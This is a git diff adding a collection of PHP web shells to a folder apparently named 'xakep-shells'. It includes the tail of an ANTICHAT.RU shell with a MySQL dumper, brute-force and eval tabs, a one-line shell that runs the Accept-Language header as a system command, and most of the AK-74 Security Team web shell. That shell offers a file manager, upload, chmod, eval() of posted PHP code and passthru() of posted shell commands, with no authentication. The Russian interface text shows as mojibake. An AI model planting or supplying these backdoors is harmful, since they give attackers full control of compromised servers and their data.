+<tr><td valign=top>Ïàðîëü: <input name=pass value='$pass' size=20>
+<input type=hidden name=p value=sql></td></tr>
+<tr><td></td><td><input type=submit name=conn value=Ïîäêëþ÷èòüñÿ></form></td></tr>
+</table>";
+}
+@$conn=$_POST['conn'];
+@$adress=$_POST['adress'];
+@$port=$_POST['port'];
+@$login=$_POST['login'];
+@$pass=$_POST['pass'];
+if($conn){
+
+$serv = @mysql_connect("$adress:$port", "$login", "$pass") or die("ÎØÈÁÊÀ: ".mysql_error());
+if($serv){
+$content.="<form name='conn' action='$php_self' method='post'><input type=hidden name=conn value=0>
+<input type='hidden' name='action' value='$action'>
+Ñòàòóñ: Ïîäêëþ÷åí : <input type=submit name=exit value='Âûéòè èç áàçû'></form>
+<table><tr><td><font color=red>[Òàáëèöû]<br></br>";
+}
+$res = mysql_list_dbs($serv);
+while ($str=mysql_fetch_row($res)){
+$content.= "<table><a href=\"#\" onclick=\"document.dump1.db.value='$str[0]';document.dump1.tbl.value='$str[0]';document.dump1.submit();\">$str[0]</a></table>";
+@$tc++;
+}
+$content.="<form name='dump1' action='$php_self' method='POST'>
+<input type='hidden' name='action' value='$action'>
+<input type=hidden name=ac value=sql>
+<input name=base value='1' type=hidden>
+<input name=db value='$str[0]' type=hidden>
+<input name=p value='sql' type=hidden>
+<input name=adress value='$adress' type=hidden>
+<input name=port value='$port' type=hidden>
+<input name=login value='$login' type=hidden>
+<input name=pass value='$pass' type=hidden>
+<input name=conn value='1' type=hidden>
+<input name=tbl value='$str[0]' type=hidden></form>";
+
+@$base=$_POST['base'];
+@$db=$_POST['db'];
+$content.="<br></br><font color=red>[Âñåãî òàáëèö: $tc]";
+if($base){
+$content.="<br></br><font color=red>Òàáëèöà: [$tbl]<br>";
+$result=mysql_list_tables($db);
+while($str=mysql_fetch_array($result)){
+$c=mysql_query ("SELECT COUNT(*) FROM $str[0]");
+$records=mysql_fetch_array($c);
+$content.="<table><font color=red>[$records[0]]</font><a href=\"#\" onclick=\"document.dump2.vn.value='$str[0]';document.dump2.tbl.value='$str[0]';document.dump2.submit();\">$str[0]</a></table>";
+
+mysql_free_result($c);
+}}
+$content.="<form name='dump2' action='$php_self' method='post'>
+<input type='hidden' name='action' value='$action'>
+<input type=hidden name=ac value=sql>
+<input name=inside value='1' type=hidden>
+<input name=base value='1' type=hidden>
+<input name=vn value='$str[0]' type=hidden>
+<input name=db value='$db' type=hidden>
+<input name=p value='sql' type=hidden>
+<input name=adress value='$adress' type=hidden>
+<input name=port value='$port' type=hidden>
+<input name=login value='$login' type=hidden>
+<input name=pass value='$pass' type=hidden>
+<input name=tbl value='$str[0]' type=hidden>
+<input name=conn value='1' type=hidden></form>";
+
+@$vn=$_POST['vn'];
+$content.= "<td valign=top>Áàçà äàííûõ: $db => $vn<br>";  
+@$inside=$_POST['inside'];
+@$tbl=$_POST['tbl'];
+if($inside){
+$content.= "<table cellpadding=0 cellspacing=1><tr>";
+
+mysql_select_db($db) or die(mysql_error());
+$c=mysql_query ("SELECT COUNT(*) FROM $tbl");
+$cfa=mysql_fetch_array($c);
+mysql_free_result($c);
+$content.= "Âñåãî: $cfa[0]<form name='mysql_dump' action='$php_self' method='post'>
+<input type='hidden' name='action' value='$action'>
+<input type=hidden name=ac value=sql>
+Îò: <input name=from size=3 value=0>
+Äî: <input name=to size=3 value=$cfa[0]>
+<input type=submit name=show value='Çàãðóçèòü'>
+<input type=hidden name=inside value=1>
+<input type=hidden name=vn value=$vn>
+<input type=hidden name=db value=$db>
+<input type=hidden name=login value=$login>
+<input type=hidden name=pass value=$pass>
+<input type=hidden name=adress value=$adress>
+<input type=hidden name=conn value=1>
+<input type=hidden name=base value=1>
+<input type=hidden name=p value=sql>
+<input type=hidden name=tbl value=$tbl>
+</form>";
+@$vn=$_POST['vn'];
+@$from=$_POST['from'];
+@$to=$_POST['to'];
+@$from=$_POST['from'];
+@$to=$_POST['to'];
+if(!isset($from)){$from=0;}
+if(!isset($to)){$to=50;}
+$query = "SELECT * FROM $vn LIMIT $from,$to";
+$result = mysql_query($query);
+for ($i=0;$i<mysql_num_fields($result);$i++){
+$name=mysql_field_name($result,$i);
+$content.="<td>&nbsp;</td><td bgcolor=#44474f><font color=red> $name </font></td> ";
+}
+while($mn = mysql_fetch_array($result, MYSQL_ASSOC)){
+$content.= "<tr>";
+foreach ($mn as $come=>$lee) {
+$nst_inside=htmlspecialchars($lee);
+$content.= "<td>&nbsp;</td><td bgcolor=#44474f>$nst_inside</td>\r\n";
+} 
+}
+mysql_free_result($result);
+$content.= "</table>";
+}}}
+
+//end function
+
+?><?=$header;?><table width="100%" bgcolor="#31333b"  align="right" border="0" cellspacing="0" cellpadding="0"><tr><td><table><tr><td><a href="#" onclick="document.reqs.action.value='shell';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">.| Shell |. </a></td><td><a href="#" onclick="document.reqs.action.value='viewer';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">.| Viewer |.</a></td><td><a href="#" onclick="document.reqs.action.value='editor';document.reqs.file.value='<?=$file;?>';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">.| Editor |.</a></td><td><a href="#" onclick="document.reqs.action.value='upload';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">.| Upload |.</a></td><td><a href="#" onclick="document.reqs.action.value='brute';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">.| Brute |.</a></td><td><a href="#" onclick="document.reqs.action.value='mysql';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">.| Mysql Dumper|.</a></td><td><a href="#" onclick="document.reqs.action.value='phpeval';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">.| Php Eval |.</a></td><td><a href="#" onclick="history.back();">.| <-back |.</a></td><td><a href="#" onclick="history.forward();">.| forward->|.</a></td></tr></table></td></tr></table><br><form name='reqs' method='POST'><input name='action' type='hidden' value=''><input name='dir' type='hidden' value=''><input name='file' type='hidden' value=''></form><table style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#363940 borderColorLight=#c0c0c0 border=1> <tr><td>Safe mode: <?php echo $safe_mode;?><br>Disable functions: <?php echo $disfunc;?><br>OS: <?php echo @php_uname();?><br>Server: <?php echo @getenv("SERVER_SOFTWARE")?><br>Id: <?php echo "Uid=".getmyuid(). " Gid=".getmygid(); ?><br><? echo 'Server: '.@gethostbyname($_SERVER["HTTP_HOST"]).' You: '.$_SERVER['REMOTE_ADDR'].' XFF: '.@gethostbyaddr($HTTP_X_FORWARDED_FOR).' ';?></br> Status: <?php echo @$stdata;?></td></tr></table><table style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#363940 borderColorLight=#c0c0c0 border=1><tr><td width="100%" valign="top"><?=$content;?>
+<br></table><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#44474f BORDER=1 width=100% align=center bordercolor=#808080 bordercolorlight=black bordercolordark=#44474f><tr><td><center><font color='#9acd32' face='Tahoma' size = 2><b>| COPYRIGHT BY ANTICHAT.RU | Made by Grinay | Modified by Go0o$E |</b></font></center></td></tr></table><?=$footer;?>
diff --git a/xakep-shells/PHP/accept_language.php.txt b/xakep-shells/PHP/accept_language.php.txt
new file mode 100644
index 0000000..b3c8e0a
--- /dev/null
+++ b/xakep-shells/PHP/accept_language.php.txt
@@ -0,0 +1 @@
+<?php passthru(getenv("HTTP_ACCEPT_LANGUAGE")); echo '<br> by q1w2e3r4'; ?>
diff --git a/xakep-shells/PHP/ak74shell.php.php.txt b/xakep-shells/PHP/ak74shell.php.php.txt
new file mode 100644
index 0000000..413e26e
--- /dev/null
+++ b/xakep-shells/PHP/ak74shell.php.php.txt
@@ -0,0 +1,640 @@
+<?
+/*                              
+
+.:: :[AK-74 Security Team Web Shell Beta Version]: ::.
+
+- AK-74 Security Team Web Site: www.ak74-team.net
+- Released on 01 June 2006.
+- Copyright AK-74 Security Team, 2006.
+- Thank you for using our script. 
+
+*/
+error_reporting(0); 
+set_time_limit(0);
+session_start();
+$xshell = $SERVER_['PHP_SELF'];
+class shell
+{
+
+ function getfiles()
+ {
+  $mas = array();
+  $i = 0;
+  if ($handle = opendir($_SESSION['currentdir']))
+  {
+   while (false !== ($file = readdir($handle)))
+   if ($file != '..')
+    if (!is_dir($_SESSION['currentdir'].'/'.$file))
+	{
+     $mas[$i]['filename'] = $file;
+	 $mas[$i]['filesize'] = filesize($_SESSION['currentdir'].'/'.$file);
+	 $mas[$i]['lastmod'] = date("H.i/d.m.Y", filemtime($_SESSION['currentdir'].'/'.$file));
+	 $i++;
+	}
+   closedir($handle); 
+  }
+  return $mas;
+ }
+
+ function getdirs()
+ {
+  $mas = array();
+  if ($handle = opendir($_SESSION['currentdir']))
+  {
+   while (false !== ($dir = readdir($handle)))
+    if ($dir != '.' && is_dir($_SESSION['currentdir'].'/'.$dir))
+     $mas[] = $dir;
+   closedir($handle); 
+  }
+  return $mas;
+ }
+
+ function geturl()
+ {
+  if ($_SESSION['currentdir'].'/' == $_SERVER['DOCUMENT_ROOT'])
+   return '/';
+  if (strpos($_SESSION['currentdir'],str_replace('\\','/',$_SERVER['DOCUMENT_ROOT'])) === false)
+   return '';
+  return str_replace($_SERVER['DOCUMENT_ROOT'],'',$_SESSION['currentdir'].'/');
+ }
+
+ 
+ function removefile()
+ {
+  if (file_exists($_GET['file']))
+  {
+   chmod($_GET['file'],0777);
+   if (unlink($_GET['file']))
+    return 'Ôàéë óäàëåí!';
+   else
+    return 'Ôàéë óäàëåí!';
+  }
+  else
+   return 'Ôàéë íå íàéäåí!';
+ }
+
+  function removedir()
+ {
+   chmod($_GET['dir'],0777);
+   if (rmdir($_GET['dir']))
+    return 'Äèðåêòîðèÿ óäàëåíà!';
+   else
+    return 'Äèðåêòîðèÿ íå íàéäåía!';
+ }
+ 
+function getmicrotime()
+{
+ list($usec, $sec) = explode(" ",microtime()); 
+ return ((float)$usec + (float)$sec); 
+} 
+
+function getpermission($path)
+{
+
+$perms = fileperms($path);
+
+if (($perms & 0xC000) == 0xC000)
+ $info = 's';
+elseif (($perms & 0xA000) == 0xA000)
+ $info = 'l';
+elseif (($perms & 0x8000) == 0x8000)
+ $info = '-';
+elseif (($perms & 0x6000) == 0x6000)
+ $info = 'b';
+elseif (($perms & 0x4000) == 0x4000)
+ $info = 'd';
+elseif (($perms & 0x2000) == 0x2000)
+ $info = 'c';
+elseif (($perms & 0x1000) == 0x1000)
+ $info = 'p';
+else
+ $info = 'u';
+
+$info .= (($perms & 0x0100) ? 'r' : '-');
+$info .= (($perms & 0x0080) ? 'w' : '-');
+$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));
+
+$info .= (($perms & 0x0020) ? 'r' : '-');
+$info .= (($perms & 0x0010) ? 'w' : '-');
+$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));
+
+$info .= (($perms & 0x0004) ? 'r' : '-');
+$info .= (($perms & 0x0002) ? 'w' : '-');
+$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));
+
+return $info;
+}
+
+function getpermissionarray($path)
+{
+$res = array();
+$perms = fileperms($path);
+
+if (($perms & 0xC000) == 0xC000)
+ $res[] = 's';
+elseif (($perms & 0xA000) == 0xA000)
+ $res[] = 'l';
+elseif (($perms & 0x8000) == 0x8000)
+ $res[] = '-'; 
+elseif (($perms & 0x6000) == 0x6000)
+ $res[] = 'b';
+elseif (($perms & 0x4000) == 0x4000)
+ $res[] = 'd';
+elseif (($perms & 0x2000) == 0x2000)
+ $res[] = 'c';
+elseif (($perms & 0x1000) == 0x1000)
+ $res[] = 'p';
+else
+ $res[] = 'u';
+
+$res[] = (($perms & 0x0100) ? 'r' : '-');
+$res[] = (($perms & 0x0080) ? 'w' : '-');
+$res[] = (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));
+
+$res[] = (($perms & 0x0020) ? 'r' : '-');
+$res[] = (($perms & 0x0010) ? 'w' : '-');
+$res[] = (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));
+
+$res[] = (($perms & 0x0004) ? 'r' : '-');
+$res[] = (($perms & 0x0002) ? 'w' : '-');
+$res[] = (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));
+
+return $res;
+}
+
+function outputhead()
+{
+$res = '';
+$res .= '<html><head><title>AK-74 Security Team Web Shell</title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"></head>
+<body>
+<STYLE>
+A:link {
+	COLOR: #4d6d91; TEXT-DECORATION: underline
+}
+A:active {
+	COLOR: #4d6d91; TEXT-DECORATION: underline
+}
+A:visited {
+	COLOR: #4d6d91; TEXT-DECORATION: underline
+}
+A:hover {
+	COLOR: #C10000; TEXT-DECORATION: underline
+}
+TD {
+	FONT-SIZE: 10pt; FONT-FAMILY: verdana,arial,helvetica
+}
+BODY {
+	FONT-SIZE: 10pt; FONT-FAMILY: verdana,arial,helvetica; SCROLLBAR-FACE-COLOR: #cccccc; SCROLLBAR-HIGHLIGHT-COLOR: #c10000; SCROLLBAR-SHADOW-COLOR: #c10000; SCROLLBAR-3DLIGHT-COLOR: #830000; SCROLLBAR-ARROW-COLOR: #c10000; SCROLLBAR-TRACK-COLOR: #eeeeee; FONT-FAMILY: verdana; SCROLLBAR-DARKSHADOW-COLOR: #830000; BACKGROUND-COLOR: #dcdcdc; 
+}
+</STYLE>
+<div align="center"><table border=1 bgcolor=#eeeeee cellspacing=0 cellpadding=3 style="border: #C10000 2px solid">
+ <tr>
+  <td colspan=7 align="center">
+   <b><font color=#830000 size=4>.:: :[ AK-74 Security Team Web-shell ]: ::.</font></b>
+  </td>
+ </tr>';
+return $res;
+}
+
+function outputmenu()
+{
+ $res = '';
+ $res .= '<tr>
+  <td colspan=7 align="center">
+   <table border=0 cellspacing=0 cellpadding=0>
+    <tr align="center">
+	 <td width=150>
+	  <a href="'.$xshell.'?act=info">Îáùàÿ èíôîðìàöèÿ</a>
+	 </td>
+	 <td width=150>
+	  <a href="'.$xshell.'?act=filemanager">Ôàéëîâûé ìåíåäæåð</a>
+	 </td>
+	 <td width=80>
+	  <a href="'.$xshell.'?act=phpinfo" target="_blank">phpinfo()</a>
+	 </td>
+	 <td width=110>
+	  <a href="'.$xshell.'?act=execute">Âûïîëíèòü PHP</a>
+	 </td>
+	 <td width=150>
+	  <a href="'.$xshell.'?act=exesys">Âûïîëíèòü êîìàíäó</a>
+	 </td>
+      </tr>
+   </table>
+  </td>
+ </tr>';
+ return $res;
+}
+
+function outputdown()
+{
+ $res = '';
+ $res .= '</table></div></body></html>';
+ return $res;
+}
+
+function outputfilemanager()
+{
+$res = ''; 
+$number = 0;
+$dirs = $this->getdirs();
+$files = $this->getfiles();
+sort($dirs);
+sort($files);
+
+$res .= '
+ <tr>
+  <td colspan=7 align="center">
+  <font color=#830000> Òåêóùàÿ äèðåêòîðèÿ:</font><b><font color=#830000>'.$_SESSION['currentdir'].'</font></b>
+  </td>
+ </tr>
+ <tr align="center">
+  <td width=30>
+   &nbsp;
+  </td>
+  <td width=330>
+   &nbsp;
+  </td>
+  <td width=80><font color=#830000>Ðàçìåð,</font> <b><font color=#830000>áàéò</font></b>
+   &nbsp;
+  </td>
+  <td width=120><font color=#830000>
+   Ïîñëåäíåå èçìåíåíèå
+   </font>
+  </td>
+  <td width=80 align="center"><font color=#830000>Ïðàâà äîñòóïà</font>
+   &nbsp;
+  </td>
+  <td width=30>
+   &nbsp;
+  </td>
+  <td width=30>
+   &nbsp;
+  </td>
+ </tr>';
+
+for ($i = 0; $i < count($dirs); $i++)
+{
+ $res .= '<tr><td><b><font color=#830000>'.(++$number).'</font></b></td><td><b><a href="'.$xshell.'?act=filemanager&dir='.$dirs[$i].'">'.$dirs[$i].'</a></b></td><td>&nbsp;</td><td>&nbsp;</td><td>';
+ $res .= '<a href="'.$xshell.'?act=chmod&file='.$_SESSION['currentdir'].'/'.$dirs[$i].'">'.($this->getpermission($_SESSION['currentdir'].'/'.$dirs[$i])).'</a>';
+ $res .= '</td><td>&nbsp;</td><td><a href="'.$xshell.'?act=filemanager&act3=del&dir='.$_SESSION['currentdir'].'/'.$dirs[$i].'">delete</a></td></tr>';
+}
+for ($i = 0; $i < count($files); $i++)
+{
+ $res .= '<tr><td><b><font color=#830000>'.(++$number).'</font></b></td>';
+ $res .= '<td><a href="'.$xshell.'?act=down&file='.$_SESSION['currentdir'].'/'.$files[$i]['filename'].'">'.$files[$i]['filename'].'</a></td>';
+ $res .= '<td>&nbsp;&nbsp;'.$files[$i]['filesize'].'</td>';
+ $res .= '<td align="center">'.$files[$i]['lastmod'].'</td>';
+ $res .= '<td align="center"><a href="'.$xshell.'?act=chmod&file='.$_SESSION['currentdir'].'/'.$files[$i]['filename'].'">'.($this->getpermission($_SESSION['currentdir'].'/'.$files[$i]['filename'])).'</a></td>';
+ $res .= '<td align="center"><a href="'.$xshell.'?act=edit&file='.$_SESSION['currentdir'].'/'.$files[$i]['filename'].'">edit</a></td>';
+ $res .= '<td align="center"><a href="'.$xshell.'?act=filemanager&act2=del&file='.$_SESSION['currentdir'].'/'.$files[$i]['filename'].'">delete</a></td></tr>';
+}
+$res .= '</table><br>';
+
+$res .= '<table border=0 bgcolor=#eeeeee cellspacing=0 cellpadding=3 style="border: #C10000 2px solid">';
+$res .= '<tr><td align=center><form action="'.$xshell.'?act=filemanager" method="post"><input type="hidden" name="action" value="mkdir"><b><font color=#830000>Ñîçäàòü äèðåêòîðèþ:</b></font> </td><td><input type="text" name="dircreate"><input type="submit" value="Ñîçäàòü"></form></td></tr>';
+$res .= '<tr><td align=center><form action="'.$xshell.'?act=filemanager" method="post"><input type="hidden" name="action" value="createfile"><b><font color=#830000>Ñîçäàòü ôàéë:</b></font></td><td> <input type="text" name="filecreate"><input type="submit" value="Ñîçäàòü"></form></td></tr>';
+$res .= '<tr><td align=center><form enctype="multipart/form-data" action="'.$xshell.'?act=filemanager" method="post"><input type="hidden" name="action" value="uploadfile"><b><font color=#830000>Çàêà÷àòü ôàéë:</font></b></td><td><input type="file" name="filename" size="23"> <b><font color=#830000>è ïðèñâîèòü èìÿ</b></font></td><td> <input type="text" name="filename2"><input type="submit" value="Âïåð¸ä"></form></td></tr>';
+$res .= '<table border=0 width="700" bgcolor=#eeeeee cellspacing=0 cellpadding=3 style="border: #C10000 1px solid">';
+$res .= '<tr><td align=center><b><font color=#83000>Copyright </font><a href="http://ak74-team.net" target="_blank">AK-74 Security Team<a> <font color=#83000>2005 - '.date("Y").'</font></b></td></tr>';
+return $res;
+}
+
+function outputinfo()
+{
+ $res = '';
+ $res .= '<tr>
+  <td align="center" colspan=7>
+   <b><font color=#83000>Îáùàÿ èíôîðìàöèÿ î ñåðâåðå</font></b>
+  </td>
+ </tr>
+ <tr>
+  <td colspan=7 align="left"><br>
+   <ol>
+    <b><font color=#830000>1. OS - </font></b><font color=#830000>'.(php_uname()).'</font><br><br>
+    <b><font color=#830000>2.  Âåðñèÿ PHP - </font></b><font color=#830000>'.(phpversion()).'</font><br><br>
+    <b><font color=#830000>3.</font></b><font color=#830000> <b><font color=#830000>User</b></font> - '.( get_current_user()).' <b><font color=#830000>|| User ID</font></b> - '.( getmyuid()).' <b><font color=#830000>|| Group ID</b></font> - '.( getmygid ()).'</font><br><br>
+    <b><font color=#830000>4. Server Software - </font></b><font color=#830000>'.(getenv('SERVER_SOFTWARE')).'</font><br><br>
+    <b><font color=#830000>5. Request Method - </font></b><font color=#830000>'.(getenv('REQUEST_METHOD')).'</font><br><br>
+    <b><font color=#830000>6. Server IP - </font></b><font color=#830000>'.(getenv('SERVER_ADDR')).'</font><br><br>
+    <b><font color=#830000>7. Your IP - </font></b><font color=#830000>'.(getenv('REMOTE_ADDR')).'</font><br><br>
+	<b><font color=#830000>8. X Forwarded For IP - </font></b><font color=#830000>'.(getenv('HTTP_X_FORWARDED_FOR')).'</font><br><br>
+</td>
+ </tr>
+ <table border=0 width="555" bgcolor=#eeeeee cellspacing=0 cellpadding=3 style="border: #C10000 1px solid">
+<tr><td align=center><b><font color=#83000>Copyright </font><a href="http://ak74-team.net" target="_blank">AK-74 Security Team<a> <font color=#83000>2005 - '.date("Y").'</font></b></td></tr>';
+
+ return $res;
+}
+
+function chmodform($file)
+{
+$perms = $this->getpermissionarray($file);
+$res = '';
+$res .= '<form action="'.$xshell.'?act=filemanager" method="post"><input type="hidden" name="action" value="chmod">'
+       .'<input type="hidden" name="file" value="'.$file.'">
+ <tr>
+  <td align="center" colspan=7>
+   <b><font color=#83000>Èçìåíåíèå ïðàâ äîñòóïà</font></b>
+  </td>
+ </tr>
+ <tr>
+  <td colspan=7 align="center">
+   <table border=1 cellspacing=0 cellpadding=0>';
+$res .= '<tr align="center"><td>&nbsp;</td><td>r</td><td>w</td><td>x</td><td>r</td><td>w</td><td>x</td><td>r</td><td>w</td><td>x</td></tr>';
+$res .= '<tr><td><input type="hidden" name="perms0" value="'.$perms[0].'">'.$perms[0].'</td>';
+for ($i = 1; $i <= 9; $i++)
+ $res .= '<td><input type="checkbox" name="perms'.$i.'"'.(($perms[$i] != '-') ? ' checked' : '' ).'></td>';
+$res .= '</tr><tr><td colspan=10 align="right"><input type="submit" value="Ñîõðàíèòü"></td></tr>';
+$res .= '</table></td></tr></form>';
+return $res;
+}
+
+function editfileform($file)
+{
+$fp = fopen($file,'r');
+if (!$fp)
+ return 'Ðåäàêòèðîâàíèå ôàéëà';
+$res = '';
+$res .= '<form action="'.$xshell.'?act=filemanager" method="post"><input type="hidden" name="action" value="editfile">'
+       .'<input type="hidden" name="file" value="'.$file.'"><tr>
+  <td align="center" colspan=7>
+   <b><font color=#83000>Ðåäàêòèðîâàíèå ôàéëà</font></b>
+  </td>
+ </tr>
+ <tr>
+  <td colspan=7 align="center">
+   <table border=1 cellspacing=0 cellpadding=0>';
+ $res .= '<tr><td><textarea rows=25 cols=100 name="filecontent">'.(htmlspecialchars(fread($fp, filesize($file)))).'</textarea></td></tr>';
+ $res .= '<tr><td align="right"><b><font color=#830000>Rename:</font></b> <INPUT TYPE=TEXT NAME=rename size=100 maxlength=9999999 value='.$file.'> - <input type="submit" value="Ðåäàêòèðîâàòü"></td></tr>';
+ $res .= '</table></td></tr></form>';
+ fclose($fp);
+ return $res;
+}
+
+function executeform()
+{
+ $res = '';
+ $res .= '<form action="'.$xshell.'?act=execute" method="post"><input type="hidden" name="action" value="execute">
+ <tr>
+  <td align="center" colspan=7>
+   <b><font color=#83000>Âûïîëíåíèå PHP-êîäà<br> Îòêðûòèå è çàêðûòèå PHP êîäà ( &lt;? è ?> ) ïèñàòü íå íóæíî!</font></b>
+  </td>
+ </tr>
+ <tr>
+  <td colspan=7 align="center">
+   <table border=1 cellspacing=0 cellpadding=0><tr><td><textarea rows=20 cols=80 name="phpcode">';
+ $res .= '</textarea></td></tr><tr><td align="right"><input type="submit" value="Âûïîëíèòü"></td></tr></table></td></tr>
+ <table border=0 width="555" bgcolor=#eeeeee cellspacing=0 cellpadding=3 style="border: #C10000 1px solid">
+<tr><td align=center><b><font color=#83000>Copyright </font><a href="http://ak74-team.net" target="_blank">AK-74 Security Team<a> <font color=#83000>2005 - '.date("Y").'</font></b></td></tr>';
+ return $res;
+}
+
+function execute()
+{
+echo "<hr>";
+echo "<pre>";
+eval(stripslashes($_POST['phpcode']));
+echo "</pre>";
+echo "<hr>";
+ }
+
+function exesysform()
+{
+ $res = '';
+  $res .= '<form action="'.$xshell.'?act=exesys" method="post"><input type="hidden" name="action" value="exesys">
+ <tr>
+  <td align="center" colspan=7>
+   <b><font color=#83000>Execute system commands!</font></b>
+  </td>
+ </tr>
+ <tr>
+  <td colspan=7 align="center">
+   <table border=1 cellspacing=0 cellpadding=0><tr><td><textarea rows=5 cols=80 name="cmmd">';
+ $res .= '</textarea></td></tr><tr><td align="right"><input type="submit" value="Âûïîëíèòü"></td></tr></table></td></tr>
+ <table border=0 width="555" bgcolor=#eeeeee cellspacing=0 cellpadding=3 style="border: #C10000 1px solid">
+<tr><td align=center><b><font color=#83000>Copyright </font><a href="http://ak74-team.net" target="_blank">AK-74 Security Team<a> <font color=#83000>2005 - '.date("Y").'</font></b></td></tr>';
+ return $res;
+}
+
+function exesys()
+{
+echo "<hr>";
+echo "<pre>";
+$result = passthru($_POST['cmmd']);
+echo "</pre>";
+echo "<hr>";
+}
+
+function editfile($file)
+{
+if (!empty($_POST['rename'])) {
+rename ($_POST['file'], $_POST['rename']);
+}
+ $fp = fopen($_POST['rename'],'w');
+ if (!$fp)
+  return 0;
+ fwrite($fp, stripslashes($_POST['filecontent']));
+ fclose($fp);
+ return 1;
+}
+ 
+function chmodfile($file)
+{
+ $res = 0;
+ switch ($_POST['perms0'])
+ {
+  case 's':
+   $res = $res | 0xC000;
+  break;
+  case 'l':
+   $res = $res | 0xA000;
+  break;
+  case '-':
+   $res = $res | 0x8000;
+  break;
+  case 'b':
+   $res = $res | 0x6000;
+  break;
+  case 'd':
+   $res = $res | 0x4000;
+  break;
+  case 'c':
+   $res = $res | 0x2000;
+  break;
+  case 'p':
+   $res = $res | 0x1000;
+  break;
+  case 'u':
+
+  break;
+ }
+if (isset($_POST['perms1']))
+ $res = $res | 0x0100;
+if (isset($_POST['perms2']))
+ $res = $res | 0x0080;
+if (isset($_POST['perms3']))
+ $res = $res | 0x0040;
+
+if (isset($_POST['perms4']))
+ $res = $res | 0x0020;
+if (isset($_POST['perms5']))
+ $res = $res | 0x0010;
+if (isset($_POST['perms6']))
+ $res = $res | 0x0008;
+
+if (isset($_POST['perms7']))
+ $res = $res | 0x0004;
+if (isset($_POST['perms8']))
+ $res = $res | 0x0002;
+if (isset($_POST['perms9']))
+ $res = $res | 0x0001;
+echo substr(sprintf('%o', $res), -4);
+return chmod($file,intval(substr(sprintf('%o', $res), -4),8));
+
+}
+
+function downloadfile($file)
+{
+header ("Content-Type: application/octet-stream");
+header ("Content-Length: " . filesize($file));
+header ("Content-Disposition: attachment; filename=$file");
+readfile($file);
+die();
+}
+
+function createdir()
+{
+ if (!empty($_POST['dircreate']))
+  if (mkdir($_SESSION['currentdir'].'/'.$_POST['dircreate']))
+   return 'Äèðåêòîðèÿ ñîçäàíà!';
+   
+ return 'Îøèáêà ïðè ñîçäàíèè äèðåêòîðèè';
+}
+
+function createfile()
+{
+ if (!empty($_POST['filecreate']))
+ {
+  if (file_exists($_SESSION['currentdir'].'/'.$_POST['filecreate']))
+   return 'Ôàéë óæå ñóùåñòâóåò';
+  $fp = fopen($_SESSION['currentdir'].'/'.$_POST['filecreate'],"w");
+  if ($fp)
+  {
+   fclose($fp);
+   return 'Ôàéë ñîçäàí!';
+  }
+ }
+   
+ return 'Îøèáêà ïðè ñîçäàíèè ôàéëà';
+}
+
+function uploadfile()
+{
+ if ($_FILES['filename']['error'] != 0)
+  return '121212';
+ $_POST['filename2'] = trim($_POST['filename2']);
+ if (empty($_POST['filename2']))
+  $_POST['filename2'] = $_FILES['filename']['name'];
+ if (!copy($_FILES['filename']['tmp_name'],$_SESSION['currentdir'].'/'.$_POST['filename2']))
+  if (!move_uploaded_file($_FILES['filename']['tmp_name'],$_SESSION['currentdir'].'/'.$_POST['filename2']))
+   return 'Çàêà÷êà ôàéëà íå âûïîëíåíà...';
+ return 'Çàêà÷êà ôàéëà ïðîèçâåäåíà óñïåøíî!';
+}
+
+}
+ $shell = new shell();
+ $timestart = $shell->getmicrotime();
+ $content = '';
+ if (!isset($_SESSION['currentdir']))
+  $_SESSION['currentdir'] = str_replace('\\','/',$_SERVER['DOCUMENT_ROOT']);
+ if (isset($_GET['dir']))
+ {
+  if (opendir(realpath($_SESSION['currentdir'].'/'.$_GET['dir'])))
+   $_SESSION['currentdir'] = realpath($_SESSION['currentdir'].'/'.$_GET['dir']);
+  Header("Location: $xshell?act=filemanager");
+ }
+
+ $_SESSION['currentdir'] = str_replace('\\','/',$_SESSION['currentdir']);
+ if (substr($_SESSION['currentdir'],-1,1) == '/')
+  $_SESSION['currentdir'] = substr($_SESSION['currentdir'],0,-1);
+
+ switch ($_POST['action'])
+ {
+  case 'chmod':
+   if($shell->chmodfile($_POST['file']))
+    $content .= 'Ñìåíà ïðàâ ïðîèçîøëà óñïåøíî';
+  break;
+  
+  case 'editfile':
+   if ($shell->editfile($_POST['file']))
+    $content .= 'Ðåäàêòèðîâàíèå ïðîèçîøëî óñïåøíî';
+  break;
+  
+  case 'execute':
+   $shell->execute();
+  break;
+  
+  case 'exesys':
+   $shell->exesys();
+  break;
+  
+  case 'mkdir':
+   $content .= $shell->createdir();
+  break;
+  
+  case 'createfile':
+   $content .= $shell->createfile();
+  break;
+  
+  case 'uploadfile':
+   $content .= $shell->uploadfile();
+  break;
+ }
+ $content .= $shell->outputhead();
+ $content .= $shell->outputmenu();
+ 
+ switch ($_GET['act'])
+ {
+  case 'edit':
+   $content .= $shell->editfileform($_GET['file']);
+  break;
+  
+  case 'chmod':
+   $content .= $shell->chmodform($_GET['file']);
+  break;
+  
+  case 'down':
+   $content .= $shell->downloadfile($_GET['file']);
+  break;
+  
+  case 'filemanager':
+  if ($_GET['act2'] == 'del')
+    $content .= $shell->removefile();
+    $content .= $shell->outputfilemanager();
+  if ($_GET['act3'] == 'del')
+    $content .= $shell->removedir();
+  break;
+  
+  case 'phpinfo':
+   phpinfo();
